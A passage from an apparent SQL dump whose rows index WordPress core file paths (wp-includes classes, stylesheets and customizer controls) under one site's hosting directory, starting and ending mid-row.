cludes/class-wp-recovery-mode.php','wp-includes/class-wp-recovery-mode.php'),(15338,'/home/tummmyov/tummyrevolution.com/wp-includes/class-wp-rewrite.php','wp-includes/class-wp-rewrite.php'),(15339,'/home/tummmyov/tummyrevolution.com/wp-includes/class-wp-role.php','wp-includes/class-wp-role.php'),(15340,'/home/tummmyov/tummyrevolution.com/wp-includes/class-wp-roles.php','wp-includes/class-wp-roles.php'),(15341,'/home/tummmyov/tummyrevolution.com/wp-includes/class-wp-scripts.php','wp-includes/class-wp-scripts.php'),(15342,'/home/tummmyov/tummyrevolution.com/wp-includes/class-wp-session-tokens.php','wp-includes/class-wp-session-tokens.php'),(15343,'/home/tummmyov/tummyrevolution.com/wp-includes/class-wp-simplepie-file.php','wp-includes/class-wp-simplepie-file.php'),(15344,'/home/tummmyov/tummyrevolution.com/wp-includes/class-wp-simplepie-sanitize-kses.php','wp-includes/class-wp-simplepie-sanitize-kses.php'),(15345,'/home/tummmyov/tummyrevolution.com/wp-includes/class-wp-site-query.php','wp-includes/class-wp-site-query.php'),(15346,'/home/tummmyov/tummyrevolution.com/wp-includes/class-wp-site.php','wp-includes/class-wp-site.php'),(15347,'/home/tummmyov/tummyrevolution.com/wp-includes/class-wp-styles.php','wp-includes/class-wp-styles.php'),(15348,'/home/tummmyov/tummyrevolution.com/wp-includes/class-wp-tax-query.php','wp-includes/class-wp-tax-query.php'),(15349,'/home/tummmyov/tummyrevolution.com/wp-includes/class-wp-taxonomy.php','wp-includes/class-wp-taxonomy.php'),(15350,'/home/tummmyov/tummyrevolution.com/wp-includes/class-wp-term-query.php','wp-includes/class-wp-term-query.php'),(15351,'/home/tummmyov/tummyrevolution.com/wp-includes/class-wp-term.php','wp-includes/class-wp-term.php'),(15352,'/home/tummmyov/tummyrevolution.com/wp-includes/class-wp-text-diff-renderer-inline.php','wp-includes/class-wp-text-diff-renderer-inline.php'),(15353,'/home/tummmyov/tummyrevolution.com/wp-includes/class-wp-text-diff-renderer-table.php','wp-includes/class-wp-text-diff-renderer-table.php'),(15354,'/home/tummmyov/tummyrevolution.com/wp-includes/class-wp-textdomain-registry.php','wp-includes/class-wp-textdomain-registry.php'),(15355,'/home/tummmyov/tummyrevolution.com/wp-includes/class-wp-theme-json-data.php','wp-includes/class-wp-theme-json-data.php'),(15356,'/home/tummmyov/tummyrevolution.com/wp-includes/class-wp-theme-json-resolver.php','wp-includes/class-wp-theme-json-resolver.php'),(15357,'/home/tummmyov/tummyrevolution.com/wp-includes/class-wp-theme-json-schema.php','wp-includes/class-wp-theme-json-schema.php'),(15358,'/home/tummmyov/tummyrevolution.com/wp-includes/class-wp-theme-json.php','wp-includes/class-wp-theme-json.php'),(15359,'/home/tummmyov/tummyrevolution.com/wp-includes/class-wp-theme.php','wp-includes/class-wp-theme.php'),(15360,'/home/tummmyov/tummyrevolution.com/wp-includes/class-wp-user-meta-session-tokens.php','wp-includes/class-wp-user-meta-session-tokens.php'),(15361,'/home/tummmyov/tummyrevolution.com/wp-includes/class-wp-user-query.php','wp-includes/class-wp-user-query.php'),(15362,'/home/tummmyov/tummyrevolution.com/wp-includes/class-wp-user-request.php','wp-includes/class-wp-user-request.php'),(15363,'/home/tummmyov/tummyrevolution.com/wp-includes/class-wp-user.php','wp-includes/class-wp-user.php'),(15364,'/home/tummmyov/tummyrevolution.com/wp-includes/class-wp-walker.php','wp-includes/class-wp-walker.php'),(15365,'/home/tummmyov/tummyrevolution.com/wp-includes/class-wp-widget-factory.php','wp-includes/class-wp-widget-factory.php'),(15366,'/home/tummmyov/tummyrevolution.com/wp-includes/class-wp-widget.php','wp-includes/class-wp-widget.php'),(15367,'/home/tummmyov/tummyrevolution.com/wp-includes/class-wp-xmlrpc-server.php','wp-includes/class-wp-xmlrpc-server.php'),(15368,'/home/tummmyov/tummyrevolution.com/wp-includes/class-wp.php','wp-includes/class-wp.php'),(15369,'/home/tummmyov/tummyrevolution.com/wp-includes/class-wpdb.php','wp-includes/class-wpdb.php'),(15370,'/home/tummmyov/tummyrevolution.com/wp-includes/class.wp-dependencies.php','wp-includes/class.wp-dependencies.php'),(15371,'/home/tummmyov/tummyrevolution.com/wp-includes/class.wp-scripts.php','wp-includes/class.wp-scripts.php'),(15372,'/home/tummmyov/tummyrevolution.com/wp-includes/class.wp-styles.php','wp-includes/class.wp-styles.php'),(15373,'/home/tummmyov/tummyrevolution.com/wp-includes/comment-template.php','wp-includes/comment-template.php'),(15374,'/home/tummmyov/tummyrevolution.com/wp-includes/comment.php','wp-includes/comment.php'),(15375,'/home/tummmyov/tummyrevolution.com/wp-includes/compat.php','wp-includes/compat.php'),(15376,'/home/tummmyov/tummyrevolution.com/wp-includes/cron.php','wp-includes/cron.php'),(15377,'/home/tummmyov/tummyrevolution.com/wp-includes/css/admin-bar-rtl.css','wp-includes/css/admin-bar-rtl.css'),(15378,'/home/tummmyov/tummyrevolution.com/wp-includes/css/admin-bar-rtl.min.css','wp-includes/css/admin-bar-rtl.min.css'),(15379,'/home/tummmyov/tummyrevolution.com/wp-includes/css/admin-bar.css','wp-includes/css/admin-bar.css'),(15380,'/home/tummmyov/tummyrevolution.com/wp-includes/css/admin-bar.min.css','wp-includes/css/admin-bar.min.css'),(15381,'/home/tummmyov/tummyrevolution.com/wp-includes/css/buttons-rtl.css','wp-includes/css/buttons-rtl.css'),(15382,'/home/tummmyov/tummyrevolution.com/wp-includes/css/buttons-rtl.min.css','wp-includes/css/buttons-rtl.min.css'),(15383,'/home/tummmyov/tummyrevolution.com/wp-includes/css/buttons.css','wp-includes/css/buttons.css'),(15384,'/home/tummmyov/tummyrevolution.com/wp-includes/css/buttons.min.css','wp-includes/css/buttons.min.css'),(15385,'/home/tummmyov/tummyrevolution.com/wp-includes/css/classic-themes.css','wp-includes/css/classic-themes.css'),(15386,'/home/tummmyov/tummyrevolution.com/wp-includes/css/classic-themes.min.css','wp-includes/css/classic-themes.min.css'),(15387,'/home/tummmyov/tummyrevolution.com/wp-includes/css/customize-preview-rtl.css','wp-includes/css/customize-preview-rtl.css'),(15388,'/home/tummmyov/tummyrevolution.com/wp-includes/css/customize-preview-rtl.min.css','wp-includes/css/customize-preview-rtl.min.css'),(15389,'/home/tummmyov/tummyrevolution.com/wp-includes/css/customize-preview.css','wp-includes/css/customize-preview.css'),(15390,'/home/tummmyov/tummyrevolution.com/wp-includes/css/customize-preview.min.css','wp-includes/css/customize-preview.min.css'),(15391,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dashicons.css','wp-includes/css/dashicons.css'),(15392,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dashicons.min.css','wp-includes/css/dashicons.min.css'),(15393,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-directory/style-rtl.css','wp-includes/css/dist/block-directory/style-rtl.css'),(15394,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-directory/style-rtl.min.css','wp-includes/css/dist/block-directory/style-rtl.min.css'),(15395,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-directory/style.css','wp-includes/css/dist/block-directory/style.css'),(15396,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-directory/style.min.css','wp-includes/css/dist/block-directory/style.min.css'),(15397,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-editor/content-rtl.css','wp-includes/css/dist/block-editor/content-rtl.css'),(15398,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-editor/content-rtl.min.css','wp-includes/css/dist/block-editor/content-rtl.min.css'),(15399,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-editor/content.css','wp-includes/css/dist/block-editor/content.css'),(15400,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-editor/content.min.css','wp-includes/css/dist/block-editor/content.min.css'),(15401,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-editor/default-editor-styles-rtl.css','wp-includes/css/dist/block-editor/default-editor-styles-rtl.css'),(15402,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-editor/default-editor-styles-rtl.min.css','wp-includes/css/dist/block-editor/default-editor-styles-rtl.min.css'),(15403,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-editor/default-editor-styles.css','wp-includes/css/dist/block-editor/default-editor-styles.css'),(15404,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-editor/default-editor-styles.min.css','wp-includes/css/dist/block-editor/default-editor-styles.min.css'),(15405,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-editor/style-rtl.css','wp-includes/css/dist/block-editor/style-rtl.css'),(15406,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-editor/style-rtl.min.css','wp-includes/css/dist/block-editor/style-rtl.min.css'),(15407,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-editor/style.css','wp-includes/css/dist/block-editor/style.css'),(15408,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-editor/style.min.css','wp-includes/css/dist/block-editor/style.min.css'),(15409,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/classic-rtl.css','wp-includes/css/dist/block-library/classic-rtl.css'),(15410,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/classic-rtl.min.css','wp-includes/css/dist/block-library/classic-rtl.min.css'),(15411,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/classic.css','wp-includes/css/dist/block-library/classic.css'),(15412,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/classic.min.css','wp-includes/css/dist/block-library/classic.min.css'),(15413,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/common-rtl.css','wp-includes/css/dist/block-library/common-rtl.css'),(15414,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/common-rtl.min.css','wp-includes/css/dist/block-library/common-rtl.min.css'),(15415,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/common.css','wp-includes/css/dist/block-library/common.css'),(15416,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/common.min.css','wp-includes/css/dist/block-library/common.min.css'),(15417,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/editor-elements-rtl.css','wp-includes/css/dist/block-library/editor-elements-rtl.css'),(15418,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/editor-elements-rtl.min.css','wp-includes/css/dist/block-library/editor-elements-rtl.min.css'),(15419,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/editor-elements.css','wp-includes/css/dist/block-library/editor-elements.css'),(15420,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/editor-elements.min.css','wp-includes/css/dist/block-library/editor-elements.min.css'),(15421,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/editor-rtl.css','wp-includes/css/dist/block-library/editor-rtl.css'),(15422,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/editor-rtl.min.css','wp-includes/css/dist/block-library/editor-rtl.min.css'),(15423,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/editor.css','wp-includes/css/dist/block-library/editor.css'),(15424,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/editor.min.css','wp-includes/css/dist/block-library/editor.min.css'),(15425,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/elements-rtl.css','wp-includes/css/dist/block-library/elements-rtl.css'),(15426,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/elements-rtl.min.css','wp-includes/css/dist/block-library/elements-rtl.min.css'),(15427,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/elements.css','wp-includes/css/dist/block-library/elements.css'),(15428,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/elements.min.css','wp-includes/css/dist/block-library/elements.min.css'),(15429,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/reset-rtl.css','wp-includes/css/dist/block-library/reset-rtl.css'),(15430,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/reset-rtl.min.css','wp-includes/css/dist/block-library/reset-rtl.min.css'),(15431,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/reset.css','wp-includes/css/dist/block-library/reset.css'),(15432,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/reset.min.css','wp-includes/css/dist/block-library/reset.min.css'),(15433,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/style-rtl.css','wp-includes/css/dist/block-library/style-rtl.css'),(15434,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/style-rtl.min.css','wp-includes/css/dist/block-library/style-rtl.min.css'),(15435,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/style.css','wp-includes/css/dist/block-library/style.css'),(15436,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/style.min.css','wp-includes/css/dist/block-library/style.min.css'),(15437,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/theme-rtl.css','wp-includes/css/dist/block-library/theme-rtl.css'),(15438,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/theme-rtl.min.css','wp-includes/css/dist/block-library/theme-rtl.min.css'),(15439,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/theme.css','wp-includes/css/dist/block-library/theme.css'),(15440,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/theme.min.css','wp-includes/css/dist/block-library/theme.min.css'),(15441,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/commands/style-rtl.css','wp-includes/css/dist/commands/style-rtl.css'),(15442,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/commands/style-rtl.min.css','wp-includes/css/dist/commands/style-rtl.min.css'),(15443,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/commands/style.css','wp-includes/css/dist/commands/style.css'),(15444,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/commands/style.min.css','wp-includes/css/dist/commands/style.min.css'),(15445,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/components/style-rtl.css','wp-includes/css/dist/components/style-rtl.css'),(15446,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/components/style-rtl.min.css','wp-includes/css/dist/components/style-rtl.min.css'),(15447,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/components/style.css','wp-includes/css/dist/components/style.css'),(15448,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/components/style.min.css','wp-includes/css/dist/components/style.min.css'),(15449,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/customize-widgets/style-rtl.css','wp-includes/css/dist/customize-widgets/style-rtl.css'),(15450,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/customize-widgets/style-rtl.min.css','wp-includes/css/dist/customize-widgets/style-rtl.min.css'),(15451,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/customize-widgets/style.css','wp-includes/css/dist/customize-widgets/style.css'),(15452,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/customize-widgets/style.min.css','wp-includes/css/dist/customize-widgets/style.min.css'),(15453,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/edit-post/classic-rtl.css','wp-includes/css/dist/edit-post/classic-rtl.css'),(15454,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/edit-post/classic-rtl.min.css','wp-includes/css/dist/edit-post/classic-rtl.min.css'),(15455,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/edit-post/classic.css','wp-includes/css/dist/edit-post/classic.css'),(15456,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/edit-post/classic.min.css','wp-includes/css/dist/edit-post/classic.min.css'),(15457,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/edit-post/style-rtl.css','wp-includes/css/dist/edit-post/style-rtl.css'),(15458,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/edit-post/style-rtl.min.css','wp-includes/css/dist/edit-post/style-rtl.min.css'),(15459,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/edit-post/style.css','wp-includes/css/dist/edit-post/style.css'),(15460,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/edit-post/style.min.css','wp-includes/css/dist/edit-post/style.min.css'),(15461,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/edit-site/style-rtl.css','wp-includes/css/dist/edit-site/style-rtl.css'),(15462,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/edit-site/style-rtl.min.css','wp-includes/css/dist/edit-site/style-rtl.min.css'),(15463,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/edit-site/style.css','wp-includes/css/dist/edit-site/style.css'),(15464,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/edit-site/style.min.css','wp-includes/css/dist/edit-site/style.min.css'),(15465,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/edit-widgets/style-rtl.css','wp-includes/css/dist/edit-widgets/style-rtl.css'),(15466,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/edit-widgets/style-rtl.min.css','wp-includes/css/dist/edit-widgets/style-rtl.min.css'),(15467,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/edit-widgets/style.css','wp-includes/css/dist/edit-widgets/style.css'),(15468,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/edit-widgets/style.min.css','wp-includes/css/dist/edit-widgets/style.min.css'),(15469,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/editor/style-rtl.css','wp-includes/css/dist/editor/style-rtl.css'),(15470,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/editor/style-rtl.min.css','wp-includes/css/dist/editor/style-rtl.min.css'),(15471,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/editor/style.css','wp-includes/css/dist/editor/style.css'),(15472,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/editor/style.min.css','wp-includes/css/dist/editor/style.min.css'),(15473,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/format-library/style-rtl.css','wp-includes/css/dist/format-library/style-rtl.css'),(15474,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/format-library/style-rtl.min.css','wp-includes/css/dist/format-library/style-rtl.min.css'),(15475,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/format-library/style.css','wp-includes/css/dist/format-library/style.css'),(15476,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/format-library/style.min.css','wp-includes/css/dist/format-library/style.min.css'),(15477,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/list-reusable-blocks/style-rtl.css','wp-includes/css/dist/list-reusable-blocks/style-rtl.css'),(15478,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/list-reusable-blocks/style-rtl.min.css','wp-includes/css/dist/list-reusable-blocks/style-rtl.min.css'),(15479,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/list-reusable-blocks/style.css','wp-includes/css/dist/list-reusable-blocks/style.css'),(15480,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/list-reusable-blocks/style.min.css','wp-includes/css/dist/list-reusable-blocks/style.min.css'),(15481,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/nux/style-rtl.css','wp-includes/css/dist/nux/style-rtl.css'),(15482,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/nux/style-rtl.min.css','wp-includes/css/dist/nux/style-rtl.min.css'),(15483,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/nux/style.css','wp-includes/css/dist/nux/style.css'),(15484,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/nux/style.min.css','wp-includes/css/dist/nux/style.min.css'),(15485,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/patterns/style-rtl.css','wp-includes/css/dist/patterns/style-rtl.css'),(15486,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/patterns/style-rtl.min.css','wp-includes/css/dist/patterns/style-rtl.min.css'),(15487,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/patterns/style.css','wp-includes/css/dist/patterns/style.css'),(15488,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/patterns/style.min.css','wp-includes/css/dist/patterns/style.min.css'),(15489,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/reusable-blocks/style-rtl.css','wp-includes/css/dist/reusable-blocks/style-rtl.css'),(15490,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/reusable-blocks/style-rtl.min.css','wp-includes/css/dist/reusable-blocks/style-rtl.min.css'),(15491,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/reusable-blocks/style.css','wp-includes/css/dist/reusable-blocks/style.css'),(15492,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/reusable-blocks/style.min.css','wp-includes/css/dist/reusable-blocks/style.min.css'),(15493,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/widgets/style-rtl.css','wp-includes/css/dist/widgets/style-rtl.css'),(15494,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/widgets/style-rtl.min.css','wp-includes/css/dist/widgets/style-rtl.min.css'),(15495,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/widgets/style.css','wp-includes/css/dist/widgets/style.css'),(15496,'/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/widgets/style.min.css','wp-includes/css/dist/widgets/style.min.css'),(15497,'/home/tummmyov/tummyrevolution.com/wp-includes/css/editor-rtl.css','wp-includes/css/editor-rtl.css'),(15498,'/home/tummmyov/tummyrevolution.com/wp-includes/css/editor-rtl.min.css','wp-includes/css/editor-rtl.min.css'),(15499,'/home/tummmyov/tummyrevolution.com/wp-includes/css/editor.css','wp-includes/css/editor.css'),(15500,'/home/tummmyov/tummyrevolution.com/wp-includes/css/editor.min.css','wp-includes/css/editor.min.css'),(15501,'/home/tummmyov/tummyrevolution.com/wp-includes/css/jquery-ui-dialog-rtl.css','wp-includes/css/jquery-ui-dialog-rtl.css'),(15502,'/home/tummmyov/tummyrevolution.com/wp-includes/css/jquery-ui-dialog-rtl.min.css','wp-includes/css/jquery-ui-dialog-rtl.min.css'),(15503,'/home/tummmyov/tummyrevolution.com/wp-includes/css/jquery-ui-dialog.css','wp-includes/css/jquery-ui-dialog.css'),(15504,'/home/tummmyov/tummyrevolution.com/wp-includes/css/jquery-ui-dialog.min.css','wp-includes/css/jquery-ui-dialog.min.css'),(15505,'/home/tummmyov/tummyrevolution.com/wp-includes/css/media-views-rtl.css','wp-includes/css/media-views-rtl.css'),(15506,'/home/tummmyov/tummyrevolution.com/wp-includes/css/media-views-rtl.min.css','wp-includes/css/media-views-rtl.min.css'),(15507,'/home/tummmyov/tummyrevolution.com/wp-includes/css/media-views.css','wp-includes/css/media-views.css'),(15508,'/home/tummmyov/tummyrevolution.com/wp-includes/css/media-views.min.css','wp-includes/css/media-views.min.css'),(15509,'/home/tummmyov/tummyrevolution.com/wp-includes/css/wp-auth-check-rtl.css','wp-includes/css/wp-auth-check-rtl.css'),(15510,'/home/tummmyov/tummyrevolution.com/wp-includes/css/wp-auth-check-rtl.min.css','wp-includes/css/wp-auth-check-rtl.min.css'),(15511,'/home/tummmyov/tummyrevolution.com/wp-includes/css/wp-auth-check.css','wp-includes/css/wp-auth-check.css'),(15512,'/home/tummmyov/tummyrevolution.com/wp-includes/css/wp-auth-check.min.css','wp-includes/css/wp-auth-check.min.css'),(15513,'/home/tummmyov/tummyrevolution.com/wp-includes/css/wp-embed-template-ie.css','wp-includes/css/wp-embed-template-ie.css'),(15514,'/home/tummmyov/tummyrevolution.com/wp-includes/css/wp-embed-template-ie.min.css','wp-includes/css/wp-embed-template-ie.min.css'),(15515,'/home/tummmyov/tummyrevolution.com/wp-includes/css/wp-embed-template.css','wp-includes/css/wp-embed-template.css'),(15516,'/home/tummmyov/tummyrevolution.com/wp-includes/css/wp-embed-template.min.css','wp-includes/css/wp-embed-template.min.css'),(15517,'/home/tummmyov/tummyrevolution.com/wp-includes/css/wp-pointer-rtl.css','wp-includes/css/wp-pointer-rtl.css'),(15518,'/home/tummmyov/tummyrevolution.com/wp-includes/css/wp-pointer-rtl.min.css','wp-includes/css/wp-pointer-rtl.min.css'),(15519,'/home/tummmyov/tummyrevolution.com/wp-includes/css/wp-pointer.css','wp-includes/css/wp-pointer.css'),(15520,'/home/tummmyov/tummyrevolution.com/wp-includes/css/wp-pointer.min.css','wp-includes/css/wp-pointer.min.css'),(15521,'/home/tummmyov/tummyrevolution.com/wp-includes/customize/class-wp-customize-background-image-control.php','wp-includes/customize/class-wp-customize-background-image-control.php'),(15522,'/home/tummmyov/tummyrevolution.com/wp-includes/customize/class-wp-customize-background-image-setting.php','wp-includes/customize/class-wp-customize-background-image-setting.php'),(15523,'/home/tummmyov/tummyrevolution.com/wp-includes/customize/class-wp-customize-background-position-control.php','wp-includes/customize/class-wp-customize-background-position-control.php'),(15524,'/home/tummmyov/tummyrevolution.com/wp-includes/customize/class-wp-customize-code-editor-control.php','wp-includes/customize/class-wp-customize-code-editor-control.php'),(15525,'/home/tummmyov/tummyrevolution.com/wp-includes/customize/class-wp-customize-color-control.php','wp-includes/customize/class-wp-customize-color-control.php'),(15526,'/home/tummmyov/tummyrevolution.com/wp-includes/customize/class-wp-customize-cropped-image-control.php','wp-includes/customize/class-wp-customize-cropped-image-control.php'),(15527,'/home/tummmyov/tummyrevolution.com/wp-includes/customize/class-wp-customize-custom-css-setting.php','wp-includes/customize/class-wp-customize-custom-css-setting.php'),(15528,'/home/tummmyov/tummyrevolution.com/wp-includes/customize/class-wp-customize-date-time-control.php','wp-includes/customize/class-wp-customize-date-time-control.php'),(15529,'/home/tummmyov/tummyrevolution.com/wp-includes/customize/class-wp-customize-filter-setting.php','wp-includes/customize/class-wp-customize-filter-setting.php'),(15530,'/home/tummmyov/tummyrevolution.com/wp-includes/customize/class-wp-customize-header-image-control.php','wp-includes/customize/class-wp-customize-header-image-control.php'),(15531,'/home/tummmyov/tummyrevolution.com/wp-includes/customize/class-wp-customize-header-image-setting.php','wp-includes/customize/class-wp-customize-header-image-setting.php'),(15532,'/home/tummmyov/tummyrevolution.com/wp-includes/customize/class-wp-customize-image-control.php','wp-includes/customize/class-wp-customize-image-control.php'),(15533,'/home/tummmyov/tummyrevolution.com/wp-includes/customize/class-wp-customize-media-control.php','wp-includes/customize/class-wp-customize-media-control.php'),(15534,'/home/tummmyov/tummyrevolution.com/wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php','wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php'),(15535,'/home/tummmyov/tummyrevolution.com/wp-includes/customize/class-wp-customize-nav-menu-control.php','wp-includes/customize/class-wp-customize-nav-menu-control.php'),(15536,'/home/tummmyov/tummyrevolution.com/wp-includes/customize/class-wp-customize-nav-menu-item-control.php','wp-includes/customize/class-wp-customize-nav-menu-item-control.php'),(15537,'/home/tummmyov/tummyrevolution.com/wp-includes/customize/class-wp-customize-nav-menu-item-setting.php','wp-includes/customize/class-wp-customize-nav-menu-item-setting.php'),(15538,'/home/tummmyov/tummyrevolution.com/wp-includes/customize/class-wp-customize-nav-menu-location-control.php','wp-includes/customize/class-wp-customize-nav-menu-location-control.php'),(15539,'/home/tummmyov/tummyrevolution.com/wp-includes/customize/class-wp-customize-nav-menu-locations-control.php','wp-includes/customize/class-wp-customize-nav-menu-locations-control.php'),(15540,'/home/tummmyov/tummyrevolution.com/wp-includes/customize/class-wp-customize-nav-menu-name-control.php','wp-includes/customize/class-wp-customize-nav-menu-name-control.php'),(15541,'/home/tummmyov/tummyrevolution.com/wp-includes/customize/class-wp-customize-nav-menu-section.php','wp-includes/customize/class-wp-customize-nav-menu-section.php'),(15542,'/home/tummmyov/tummyrevolution.com/wp-includes/customize/class-wp-customize-nav-menu-setting.php','wp-includes/customize/class-wp-customize-nav-menu-setting.php'),(15543,'/home/tummmyov/tummyrevolution.com/wp-includes/customize/class-wp-customize-nav-menus-panel.php','wp-includes/customize/class-wp-customize-nav-menus-panel.php'),(15544,'/home/tummmyov/tummyrevolution.com/wp-includes/customize/class-wp-customize-new-menu-control.php','wp-includes/customize/class-wp-customize-new-menu-control.php'),(15545,'/home/tummmyov/tummyrevolution.com/wp-includes/customize/class-wp-customize-new-menu-section.php','wp-includes/customize/class-wp-customize-new-menu-section.php'),(15546,'/home/tummmyov/tummyrevolution.com/wp-includes/customize/class-wp-customize-partial.php','wp-includes/customize/class-wp-customize-partial.php'),(15547,'/home/tummmyov/tummyrevolution.com/wp-includes/customize/class-wp-customize-selective-refresh.php','wp-includes/customize/class-wp-customize-selective-refresh.php'),(15548,'/home/tummmyov/tummyrevolution.com/wp-includes/customize/class-wp-customize-sidebar-section.php','wp-includes/customize/class-wp-customize-sidebar-section.php'),(15549,'/home/tummmyov/tummyrevolution.com/wp-includes/customize/class-wp-customize-site-icon-control.php','wp-includes/customize/class-wp-customize-site-icon-control.php'),(15550,'/home/tummmyov/tummyrevolution.com/wp-includes/customize/class-wp-customize-theme-control.php','wp-includes/customize/class-wp-customize-theme-control.php'),(15551,'/home/tummmyov/tummyrevolution.com/wp-includes/customize/class-wp-customize-themes-panel.php','wp-includes/customize/class-wp-customize-themes-panel.php'),(15552,'/home/tummmyov/tummyrevolution.com/wp-includes/customize/class-wp-customize-themes-section.php','wp-includes/customize/class-wp-customize-themes-section.php'),(15553,'/home/tummmyov/tummyrevolution.com/wp-includes/customize/class-wp-customize-upload-control.php','wp-includes/customize/class-wp-customize-upload-control.php'),(15554,'/home/tummmyov/tummyrevolution.com/wp-includes/customize/class-wp-sidebar-block-editor-control.php','wp-includes/customize/class-wp-sidebar-block-editor-control.php'),(15555,'/home/tummmy